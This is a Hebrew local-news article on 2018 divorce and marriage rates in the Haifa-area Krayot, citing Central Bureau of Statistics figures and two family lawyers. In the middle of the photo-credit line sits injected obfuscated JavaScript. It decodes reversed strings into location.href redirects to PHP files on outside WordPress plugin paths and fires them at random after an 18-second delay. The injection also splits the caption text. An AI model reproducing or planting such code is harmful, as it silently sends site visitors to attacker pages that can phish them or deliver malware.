fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

קרית ביאליק מובילה בשיעור המתגרשים בקריות

מנתוני הלשכה המרכזית לסטטיסטיקה עולה, כי בקרית אתא שיעור הגירושים הוא הנמוך ביותר בקריות ושיעור הנישואים בה הגבוה ביותר בקריות
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

לקראת סוף השנה האזרחית פרסמה הלשכה המרכזית לסטטיסטיקה (הלמ"ס) את נתוני הגירושים והנישואים בישראל לשנת 2018. הלמ"ס מפרסמת דוח מדי שנתיים, שבו נתונים מפורטים ומגמות ביחס לשנים קודמות. על פי הדוח, מספר הזוגות המתגרשים בכלל האוכלוסייה בישראל עלה בכ-6 אחוזים לעומת שנת 2017 שקדמה לה. בסך הכל התגרשו ברחבי הארץ 12,071 זוגות מהאוכלוסייה היהודית.

נתוני הלמ"ס מבוססים על מידע שמקורו בתעודות נישואים וגירושים של רשות האוכלוסין וההגירה. על פי הנתונים המתייחסים לקריות בשקלול מספר התושבים, קרית ביאליק ניצבת בראש הרשימה של הגירושים עם 11.2 אחוזים, קרית ים עם 9.7 אחוזים, קרית מוצקין עם 9.4 אחוזים וקרית אתא עם 9.3 אחוזים.

הנתונים המתייחסים לנישואים מראים כי קרית אתא מובילה את הקריות עם 27.6 אחוזים, קרית ביאליק עם 24.2 אחוזים, קרית מוצקין עם 21.7 אחוזים וקרית ים עם 17.6 אחוזים.

ל-27.5 אחוזים מכלל המתגרשים בשנת 2018, אין ילדים משותפים, 16.3 אחוזים הם עם ילד אחד, 24.8 אחוזים עם שני ילדים, 19.5 אחוזים עם שלושה ילדים, 6.9 אחוזים עם ארבעה ילדים ורק לחמישה אחוזים מהמתגרשים יש חמישה ילדים משותפים ומעלה.

שיעור הזוגות המתגרשים הגבוה מתרחש לאחר 14-10 שנות נישואים. אחריהם ניצבים אלו המתגרשים לאחר 19-15 שנות נישואים. הגיל הממוצע של המתגרשים בקרב גברים הוא 44.1 ובקרב נשים הגיל הממוצע 40.9 שנים.

עוד עולה מהנתונים, כי מרבית הגירושים מתרחשים בקרב בני 44-40, חודש נובמבר היה החודש שבו נרשמו הכי הרבה גירושים ואילו חודש מאי היה החודש שבו נרשמו הכי הרבה נישואים.

עו"ד ליטל יצחק. צילום עצמי

עו"ד ליטל יצחק, שעוסקת בדיני אישות, מחזקת את הנתונים: "יש עלייה חדה בתיקי גירושים ובתיקי חדלות פירעון. אני מייחסת את זה למשבר הכלכלי שיצר נגיף הקורונה. חדלות פירעון וגירושים הולכים יד ביד למרבה הצער, וכלי תקווה לעולם ורוד יותר".

עו"ד הדס צור | צילום: דורון גולן
עו"ד הדס צור | צילום: דורון גולן

מי שמכירה היטב את הנתונים היא הדס צור, חברת מועצת העיר קרית ביאליק, עורכת דין לדיני משפחה. "יש בהחלט עלייה משמעותית בהליכי גירושים בשנים האחרונות", אומרת צור, "לדעתי הסיבות לכך נובעות מצמצום ערך המשפחה כערך עליון ביחס לפרט, יש היום מבחר עצום של אפשרויות ופיתויים, היעדר אורך רוח וקלות דעת. מוסד הנישואים כפי שאנחנו מכירים אותו לא בהכרח מתאים לכל אחד".

 

לחדשות נוספות הקליקו כאן * לדף הפייסבוק שלנו הקליקו כאן 

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות